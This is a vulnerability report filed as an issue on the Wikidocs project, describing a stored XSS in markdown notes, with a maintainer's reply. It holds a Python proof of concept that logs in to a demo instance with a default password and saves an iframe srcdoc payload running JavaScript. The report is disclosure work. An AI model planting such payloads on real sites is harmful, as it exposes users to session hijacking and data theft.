XBOW Security Report -

[niemand-sec]

Describe your issue

Disclaimer

This vulnerability was detected using XBOW, a system that autonomously finds and exploits potential security vulnerabilities. The finding has been thoroughly reviewed and validated by a security researcher before submission. While XBOW is intended to work autonomously, during its development human experts ensure the accuracy and relevance of its reports.

Description

A stored Cross-Site Scripting (XSS) vulnerability was identified in the markdown notes functionality of the application. By injecting an iframe html element containing embedded JavaScript, an attacker can execute arbitrary JavaScript in the context of the victim's browser upon viewing the uploaded image.

Mitigations

• Avoid reflecting user-defined HTML or JavaScript code in pages.
• If possible, configure proper CSP headers so even if an attacker is able to inject JS code in a page it will not be able to execute.

Impact

• Session Hijacking: Attackers can steal session cookies, allowing them to impersonate legitimate users.
• Data Theft: Access to sensitive information such as personal data, credentials, or financial details.

Device and settings

Wikidocs

Steps to reproduce

1. Execute the following python code to create the PoC:

import requests

url = 'https://demo.wikidocs.it/'
session = requests.Session()

# Authenticate
auth_data = {
    'document': 'aa',
    'password': 'demo'
}
session.post(f'{url}/submit.php?act=authentication', data=auth_data)

# Create the XSS payload that worked before
content = '''# Test Page

<iframe srcdoc="<img src=x onerror=alert('XSS')>">
'''

payload = {
    'revision': '0',
    'document': 'xss',
    'content': content
}

r3 = session.post(f'{url}/submit.php?act=content_save', data=payload)
print("Created XSS page at:", f"{url}/xss")

3. Access the malicious page:

• https://demo.wikidocs.it//xss

Screenshots (optional)

No response

Extra fields

• [ ] I'd like to work on this issue

[ffiesta]

Hi to all, i know we need to protect wikidocs with some security, ... but in my head wikidocs is like a personal library, wiki faq ... and only has 2 password (1 to read and another to write) normally user only share the read password or don't.

If this is a personal wiki system i think we need to protect very well writing password!

I don't say that we won't protect jpg or javascript or php, ... but @niemand-sec, can you show any security issues in wikidocs without use write password?

• Its more important solve security issues that won't need write password.